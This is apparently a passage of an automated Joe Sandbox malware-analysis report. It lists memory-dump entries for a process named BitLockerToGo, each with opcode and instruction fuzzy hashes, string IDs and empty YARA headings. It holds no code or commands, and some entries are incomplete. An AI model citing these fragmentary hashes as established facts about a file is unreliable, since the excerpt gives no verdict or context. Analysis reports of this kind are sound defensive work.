                                                                                                                  • Instruction Fuzzy Hash: 63F12872B043259BD724CE24D85076BB7F6AB85714F898A3FE89587381D73CDD08878A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$-
                                                                                                                  • API String ID: 0-1891628623
                                                                                                                  • Opcode ID: 9ef0e9d74da6ad656d1a223796b17ba5ee5cc0803d3cc355ef079b00ff19ef77
                                                                                                                  • Instruction ID: 409e7f0f42de908952055a9ae165f448cfce8c018921f9c463f252e9f8011cf2
                                                                                                                  • Opcode Fuzzy Hash: 9ef0e9d74da6ad656d1a223796b17ba5ee5cc0803d3cc355ef079b00ff19ef77
                                                                                                                  • Instruction Fuzzy Hash: 07E1F371B087508FD7248F38E89032AB7E3AF96320F58877EE5A5873E1D77498058B46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Inf$NaN
                                                                                                                  • API String ID: 0-3500518849
                                                                                                                  • Opcode ID: fdb9c4f1def0b44284688850e7d7e7a85fa42450cb7cadda0af4bafbfeec21dc
                                                                                                                  • Instruction ID: c35c1e7e12b3771c910db410aac6e5eeb6539b0bf606aef8e5c6bd8fc8db494e
                                                                                                                  • Opcode Fuzzy Hash: fdb9c4f1def0b44284688850e7d7e7a85fa42450cb7cadda0af4bafbfeec21dc
                                                                                                                  • Instruction Fuzzy Hash: A8D1B5B2A183019BC704DF29C88061BBBE5EBC4750F258A3EF895A73D0E775DD058B86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: p0$x
                                                                                                                  • API String ID: 0-2507914393
                                                                                                                  • Opcode ID: 630b1b5afc5f177c9431a9f5076ca5148321e1ba6648ef4f63e66009729a73fe
                                                                                                                  • Instruction ID: f6473e0c438b0c76937b8e5a4aedafa281db5fc06e111d20d1bfd7aca3b66397
                                                                                                                  • Opcode Fuzzy Hash: 630b1b5afc5f177c9431a9f5076ca5148321e1ba6648ef4f63e66009729a73fe
                                                                                                                  • Instruction Fuzzy Hash: 05A14671A083105BF310AF69DC8576BB7D9EBC5718F08863EF99487342EA78DD04878A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 2971BE6964AA73485AC05C7BE5FFBF3A$D
                                                                                                                  • API String ID: 0-4289711150
                                                                                                                  • Opcode ID: 5654aae2cd00a699ec6970eec807cb6c1d10e8086298d32956939ca547584023
                                                                                                                  • Instruction ID: 670f46167a762a40611c524bf2c349a6a5da502f4279f5c5468dde45710e4c5a
                                                                                                                  • Opcode Fuzzy Hash: 5654aae2cd00a699ec6970eec807cb6c1d10e8086298d32956939ca547584023
                                                                                                                  • Instruction Fuzzy Hash: ADB1EF746483808FD324DF65C885B6FBBE1EB92308F04892DE1D68B381D779840ACB96
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r$x
                                                                                                                  • API String ID: 0-117603716
                                                                                                                  • Opcode ID: 88f6d0e3e4a71c5209e996d4882c6d6ce2428d8ee98983d41cb78630eef4a9f8
                                                                                                                  • Instruction ID: 2c4430a27d130f18666e07c8b7d6bf09346141856affb25cd02a3f225c88f7da
                                                                                                                  • Opcode Fuzzy Hash: 88f6d0e3e4a71c5209e996d4882c6d6ce2428d8ee98983d41cb78630eef4a9f8
                                                                                                                  • Instruction Fuzzy Hash: 3F91052261D7D14AD311853D488435BEFC28BEB234F2E9B6EE5F5877D2C668C8068397
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: D$W'Y
                                                                                                                  • API String ID: 0-1118136004
                                                                                                                  • Opcode ID: 10f5109e240d04b7d956005997c127e2863bc4825cc5305122a6589d7f83d0e1
                                                                                                                  • Instruction ID: f68c4455cee8dc2bbb60a2bbd182a8c4b79648440d0fc381fb5ee526daec201d
                                                                                                                  • Opcode Fuzzy Hash: 10f5109e240d04b7d956005997c127e2863bc4825cc5305122a6589d7f83d0e1
                                                                                                                  • Instruction Fuzzy Hash: 155133B06183548BD7119F24E89676BBBF0FF92354F048A1EE4D24B391E3398905CB9B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 2aB$tw
                                                                                                                  • API String ID: 0-3611918111
                                                                                                                  • Opcode ID: beda1f8c36f9de99f509ea92a0c663d63e0946aa0ef001c5624ad58b7e78840a
                                                                                                                  • Instruction ID: d9a3f6c3f4004856945dedf7fce316257e12c42ee60794a02e20acfda04b474f
                                                                                                                  • Opcode Fuzzy Hash: beda1f8c36f9de99f509ea92a0c663d63e0946aa0ef001c5624ad58b7e78840a
                                                                                                                  • Instruction Fuzzy Hash: 0621F9B16042608BCB10EF29D85153BB7F5EF96364F568A1DE486DB391E3388D00C7A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: %1.17g
                                                                                                                  • API String ID: 0-1551345525
                                                                                                                  • Opcode ID: 8235591dee3f345f481006b61f640f0df1fe9f1d85d6e87e6014fd1bc5843c71
                                                                                                                  • Instruction ID: bc4aa90b4d418dabbab0c788fddc1a4b48de251270a44bfbbe5fbcdbb17fc428
                                                                                                                  • Opcode Fuzzy Hash: 8235591dee3f345f481006b61f640f0df1fe9f1d85d6e87e6014fd1bc5843c71
                                                                                                                  • Instruction Fuzzy Hash: 6012D4B1A04B428BE7158E58C48032BB7D2EFE1348F19857ED945AB3D1E7B9DC05CB86
                                                                                                                  • Opcode Fuzzy Hash: c04f124c9e929226a57e4175ea247ae1ab953e13aff295c5f2faf06801b7bee2
                                                                                                                  • Instruction Fuzzy Hash: EB61BBB06083808BD7149F24949066FBBF2EF96358F945A6CE0D68B351E3788549CB87
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: b9730d3210c89d47bb98c7957409f1a89f978c194504b4030e69099f46954d6e
                                                                                                                  • Instruction ID: 60b13ce5218250215142284efb923aea0821d6e460f21144138450980d483862
                                                                                                                  • Opcode Fuzzy Hash: b9730d3210c89d47bb98c7957409f1a89f978c194504b4030e69099f46954d6e
                                                                                                                  • Instruction Fuzzy Hash: 56718AB46083008FE714CF19D85176BBBF5FB89314F14891EEA958B390C37AE855CB96
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 39>?
                                                                                                                  • API String ID: 0-532897804
                                                                                                                  • Opcode ID: 4c5262abab938f83ebd32f14e8e7852a93c2daa262ab7c48957f72d3770b8c62
                                                                                                                  • Instruction ID: f725c4d04822e1715baec73c161c3ddd210037bcfca35b003f4d3afaf64405d2
                                                                                                                  • Opcode Fuzzy Hash: 4c5262abab938f83ebd32f14e8e7852a93c2daa262ab7c48957f72d3770b8c62
                                                                                                                  • Instruction Fuzzy Hash: 09514A76E583504FD308CF35EC9132BBEE2ABE9315F18893DE4C593392D63889058B86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-3019521637
                                                                                                                  • Opcode ID: 12d2d2231d14dfd7e357869e1d26870c7dcffc96ab67fa2b16c37d7a53a4cf22
                                                                                                                  • Instruction ID: 3a67e429ef3715ec7c6b5055b86593f1987a63fa3e3577edb97b3380bfcdcf10
                                                                                                                  • Opcode Fuzzy Hash: 12d2d2231d14dfd7e357869e1d26870c7dcffc96ab67fa2b16c37d7a53a4cf22
                                                                                                                  • Instruction Fuzzy Hash: 7B415A75E043045FDB109F25D850B27F3E2FB89764F29A53EE985573A2D234EC058789
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3019521637
                                                                                                                  • Opcode ID: f2482d6fbc69220c323b25f10646720930b250288ca6362d4fcf87e7e5e3193a
                                                                                                                  • Instruction ID: a96344c3989b27c1c65bf269333b9680842f2c0a63251c9e60fff348f52383dd
                                                                                                                  • Opcode Fuzzy Hash: f2482d6fbc69220c323b25f10646720930b250288ca6362d4fcf87e7e5e3193a
                                                                                                                  • Instruction Fuzzy Hash: E541B0707083518BDB18CF58A4D162BB7E2BBC5354F64896EE48127A67C375CC42CB4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 0c9e78e58cd1e67deacb44b3084c6d59b3346623e17f412f5094e70f0311c60b
                                                                                                                  • Instruction ID: 3ddd708af994ae801c711d03a4c79773daf9159475c7578897a388479b47a054
                                                                                                                  • Opcode Fuzzy Hash: 0c9e78e58cd1e67deacb44b3084c6d59b3346623e17f412f5094e70f0311c60b
                                                                                                                  • Instruction Fuzzy Hash: 9041BC702183418BE7148F29C99136BB7F0FF9A318F541A2EE4C6A7391D7788906CB1A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ?4
                                                                                                                  • API String ID: 0-2741434384
                                                                                                                  • Opcode ID: 1b18535d89bad497ce9f2cd2aa4db43e7aa12deb3a91030cb654b5e583b426a2
                                                                                                                  • Instruction ID: 85ab30a49117f2803c6af03dee967b6d7f0ee3b41b21b380993eec4a47a4db42
                                                                                                                  • Opcode Fuzzy Hash: 1b18535d89bad497ce9f2cd2aa4db43e7aa12deb3a91030cb654b5e583b426a2
                                                                                                                  • Instruction Fuzzy Hash: 66512B75B04B408FC315DE39C8953A6BBD3ABDA314F18897DD4EA8B382D639A5068701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: uxVd
                                                                                                                  • API String ID: 0-2172250569
                                                                                                                  • Opcode ID: 41a638c9d614a13b242d085b1d349e199f5cc5a5be1869bd2885ee0cb28aca49
                                                                                                                  • Instruction ID: 5a69f7641bfe0676a185e2a9ee14978a9a613b64c3d79931f7d1f3bde00317d9
                                                                                                                  • Opcode Fuzzy Hash: 41a638c9d614a13b242d085b1d349e199f5cc5a5be1869bd2885ee0cb28aca49
                                                                                                                  • Instruction Fuzzy Hash: 97311231604200ABEF21CF24DC81B6B77A6EB99350F14492EEA9683361D339DD30DF5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +
                                                                                                                  • API String ID: 0-2126386893
                                                                                                                  • Opcode ID: c0bab175173349b991536f260e003663497b5d60f15e71dbb93e9be93f1970c2
                                                                                                                  • Instruction ID: e2e61b5d000161fa634e7ae119b08431efe1e7afd56c75d32e6f44432bca0ed1
                                                                                                                  • Opcode Fuzzy Hash: c0bab175173349b991536f260e003663497b5d60f15e71dbb93e9be93f1970c2
                                                                                                                  • Instruction Fuzzy Hash: 9C412A72714B018FD328CF39C891797BBD3AB99314F198A2ED5A7C73D2DA78A8418705
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +
                                                                                                                  • API String ID: 0-2126386893
                                                                                                                  • Opcode ID: 3579074ca631a6b731198df854b01d176a75bf616f5ab20c95fb4536e53b1f3a
                                                                                                                  • Instruction ID: 167550e9fd5c2dd9b343182c6f01c802a0141f53d8b972440fee1c2c67b68b45
                                                                                                                  • Opcode Fuzzy Hash: 3579074ca631a6b731198df854b01d176a75bf616f5ab20c95fb4536e53b1f3a
                                                                                                                  • Instruction Fuzzy Hash: 94411972755B018BD328CE38C991767BBD3AFD4314F19862EC4AB873D1CB78A8418B09
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +
                                                                                                                  • API String ID: 0-2126386893
                                                                                                                  • Opcode ID: 27a417c3ecc82f528b377cbc834fc55934c6b65df83d63f1f7c2a188b87412b8
                                                                                                                  • Instruction ID: c99e24e179150d6d0090667cc7a3616c2de3b874143f0c313d16bc0183971b59
                                                                                                                  • Opcode Fuzzy Hash: 27a417c3ecc82f528b377cbc834fc55934c6b65df83d63f1f7c2a188b87412b8
                                                                                                                  • Instruction Fuzzy Hash: 65412AB2625B008BD328CE39C9D1357BBD2AB85320F1D8A2ED5EB873D1D678A5418705
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-3019521637
                                                                                                                  • Opcode ID: f59b2e17fc63073367a5c8e1ce6f6df254c007c9ed79d9a3389be7ebf24b6f82
                                                                                                                  • Instruction ID: 86a3beb0298e3e90437f5fb7a7b5769361899bae27c2e3d641cf83b2fd5a0b2b
                                                                                                                  • Opcode Fuzzy Hash: f59b2e17fc63073367a5c8e1ce6f6df254c007c9ed79d9a3389be7ebf24b6f82
                                                                                                                  • Instruction Fuzzy Hash: FA215C75F593219BD71C8F84A9E063B7752BBA5340F68952ED54263725C26DCC00C7CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f919fd25b68f8b23c47560fb3d0dbc5215077b09a4e34c6ed2e6e280f62532f7
                                                                                                                  • Instruction ID: 7354772cdba3a3d4b9d7bf619985a2b75c34df106eee684cdd04a49f43505185
                                                                                                                  • Opcode Fuzzy Hash: f919fd25b68f8b23c47560fb3d0dbc5215077b09a4e34c6ed2e6e280f62532f7
                                                                                                                  • Instruction Fuzzy Hash: A652A131508315CBC724DF59E8C02AAB3E1FFD4314F258A3ED985A7391E739A855CB8A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5869a3bac998a2a4deb05598963a1a3e3d2f6ed1da0d4b741c4235c4f5e896bf
                                                                                                                  • Instruction ID: 5aae4baba2ae82c168d3e45b2b67fdeeb5f406ffc2d1550fac66fec47c16543e
                                                                                                                  • Opcode Fuzzy Hash: 5869a3bac998a2a4deb05598963a1a3e3d2f6ed1da0d4b741c4235c4f5e896bf
                                                                                                                  • Instruction Fuzzy Hash: AE52C53190C3458FCB14CF24C0906AABBE1BF85314F198A7EEC9A67381D779E945CB86
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f86405fb2007c4bbf513690a8855a111830127e87d922487c2c063cae4f72ed2
                                                                                                                  • Instruction ID: a305dd676f73fedff789fbc527c919fdfc356436a3f3cf1ee74e6b7fc03ccdce
                                                                                                                  • Opcode Fuzzy Hash: f86405fb2007c4bbf513690a8855a111830127e87d922487c2c063cae4f72ed2
                                                                                                                  • Instruction Fuzzy Hash: 18513837E0DA904BD3146EBC5C51279AA520FA2334F2E837ADDF56B3D1C12D4C0A939A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b04901688f76106c64a28073aa96190d6d3306a9ffe946934ec998673bdd2ef5
                                                                                                                  • Instruction ID: b2452f8a71a401c2c2037abd05d5753722c25c0f8862a7d72687f07adf20167c
                                                                                                                  • Opcode Fuzzy Hash: b04901688f76106c64a28073aa96190d6d3306a9ffe946934ec998673bdd2ef5
                                                                                                                  • Instruction Fuzzy Hash: 9D614A32654B408BD3288A78CDD27A77AD39BD5324F1D863EC5E7873D2D9789841C709
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e84c5e8471833dd8903bfc6716453572c4ae7a427d7310c398446a4908ab4a10
                                                                                                                  • Instruction ID: 3a66b9335d6dbcc84703adb4645bc4faefbcfed2c257eafe649dd69867414998
                                                                                                                  • Opcode Fuzzy Hash: e84c5e8471833dd8903bfc6716453572c4ae7a427d7310c398446a4908ab4a10
                                                                                                                  • Instruction Fuzzy Hash: F141CE73F5092107876C89299C2323BA586A7D4320B1AD33EDDABDB3D8DE698D0542C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 66ff4f1896fba534801b88021873a06daaa92e35a9ee801cc655996b12d9ca27
                                                                                                                  • Instruction ID: 3619783663d70a7b68cc0fa9005bcce5286773a86b61be5b754f26e5c5c3c70e
                                                                                                                  • Opcode Fuzzy Hash: 66ff4f1896fba534801b88021873a06daaa92e35a9ee801cc655996b12d9ca27
                                                                                                                  • Instruction Fuzzy Hash: C951ACB5A042009FC714AF18C880927B7A5FF85328F158A7DE859AB392D735EC51CF9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6afac2923d5b50b7956077394385e8bc0dd9322f132002b4d0071a1d8872b946
                                                                                                                  • Instruction ID: d2c5b54c5af1bf39cd66004f6259f53bb9eb9f81a4f63154d321c402f0fc61f0
                                                                                                                  • Opcode Fuzzy Hash: 6afac2923d5b50b7956077394385e8bc0dd9322f132002b4d0071a1d8872b946
                                                                                                                  • Instruction Fuzzy Hash: 9451D831705B808FD315CB3CC89279A7BD2AB96314F1A8A7DD5EAC77C2D63DA5018711
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 145f51256ba35389317405a5068007b6d0d257ef8b0c350083cb4710a3d16822
                                                                                                                  • Instruction ID: 140468567443650af876d1640f610d98e08c8f7eeff7321258eb9999995bc83e
                                                                                                                  • Opcode Fuzzy Hash: 145f51256ba35389317405a5068007b6d0d257ef8b0c350083cb4710a3d16822
                                                                                                                  • Instruction Fuzzy Hash: 91413B71A083056BD700DF15ECC1B7BB3D5AB84748F04683DF989A7252E33AEC45879A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a71dd39cb484f1199f77af25fd17e2a8e4c5a3309abeca7a2aeacd07cba8fb45
                                                                                                                  • Instruction ID: 76bc62529342e815ec0560b03aa1ef6b175dec9f7b5410be5c9abd6549759ee3
                                                                                                                  • Opcode Fuzzy Hash: a71dd39cb484f1199f77af25fd17e2a8e4c5a3309abeca7a2aeacd07cba8fb45
                                                                                                                  • Instruction Fuzzy Hash: 694126346083008BFB218F64DC84B6BB7E6FB95714F14492ED581833A1D77AEC11CB5A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c4605d2d0239c86237d9c008eb0a06f6b3caad431740b7d23c4b71f064b8d7a9
                                                                                                                  • Instruction ID: fa8122b2b51dffddabcbc37d9296f2e12b207cbf199d9a7e36e042cfd966f633
                                                                                                                  • Opcode Fuzzy Hash: c4605d2d0239c86237d9c008eb0a06f6b3caad431740b7d23c4b71f064b8d7a9
                                                                                                                  • Instruction Fuzzy Hash: 0241163270C2900FD318CE79889016EBBD2ABC5214F19C73EF0A587394EAB8D985E755
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3db6810398f2c6e25d7dbb883ac9798450e2b7a30399b119a2cb8294678f434b
                                                                                                                  • Instruction ID: a8ecd84f0a375ab27eb45a194e4067cb6f06f6a41cab94bf5cbca86be3064f9f
                                                                                                                  • Opcode Fuzzy Hash: 3db6810398f2c6e25d7dbb883ac9798450e2b7a30399b119a2cb8294678f434b
